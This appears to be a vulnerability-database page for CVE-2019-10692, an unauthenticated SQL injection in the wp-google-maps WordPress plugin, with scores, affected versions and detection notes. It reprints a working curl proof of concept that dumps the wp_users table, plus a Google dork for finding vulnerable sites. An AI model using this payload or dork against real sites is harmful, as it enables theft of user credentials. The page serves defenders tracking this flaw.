CVE-2019-10692
published 2019-04-02CVE-2019-10692: In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.
PriorityP278critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
78.70%
99.5th percentile
In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codecabin | wp_go_maps | < 7.11.18 | 7.11.18 |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for GET requests to the WordPress REST API endpoint /wpgmza/v1/markers with a 'fields' parameter containing SQL injection payloads such as '* from wp_users -- -' ↗
- →A successful exploitation response will contain JSON fields 'user_login', 'user_pass', and 'user_nicename' in the response body with Content-Type application/json and HTTP 200 ↗
- →Use Google Dork 'inurl:index.php?rest_route=/wpgmza/' to identify potentially vulnerable WordPress instances exposed on the internet ↗
- →The vulnerability exists in wp-google-maps plugin versions between 7.11.00 and 7.11.17 inclusive; the REST endpoint is unauthenticated and requires no privileges to exploit ↗
- ·The WordPress database table prefix is configurable by administrators and may not be 'wp_'; the SQL injection payload must be adjusted accordingly (e.g., 'wp_users' may differ) ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection
exploitdb·2020-10-20·CVSS 9.8
CVE-2019-10692 [CRITICAL] WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection
---
# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
# Date: 2020-09-09
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: < 7.11.18
# Tested on: Linux
# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
#!/bin/bash
TARGET="192.168.1.77"
curl -k --silent
"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
fields=3D*+from+wp_users+--+-"
| jq
Nuclei
WordPress Google Maps <7.11.18 - SQL Injection
nuclei·CVSS 9.8
CVE-2019-10692 [CRITICAL] WordPress Google Maps <7.11.18 - SQL Injection
WordPress Google Maps <7.11.18 - SQL Injection
WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2019-10692
info:
name: WordPress Google Maps <7.11.18 - SQL Injection
author: pussycat0x
severity: critical
description: |
WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain se
Metasploit
WordPress Google Maps Plugin SQL Injection
metasploit
WordPress Google Maps Plugin SQL Injection
WordPress Google Maps Plugin SQL Injection
This module exploits a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/159640/WordPress-Rest-Google-Maps-SQL-Injection.htmlhttp://www.rapid7.com/db/modules/auxiliary/admin/http/wp_google_maps_sqlihttps://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755https://wordpress.org/plugins/wp-google-maps/#developershttp://packetstormsecurity.com/files/159640/WordPress-Rest-Google-Maps-SQL-Injection.htmlhttp://www.rapid7.com/db/modules/auxiliary/admin/http/wp_google_maps_sqlihttps://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755https://wordpress.org/plugins/wp-google-maps/#developers
2019-04-02
Published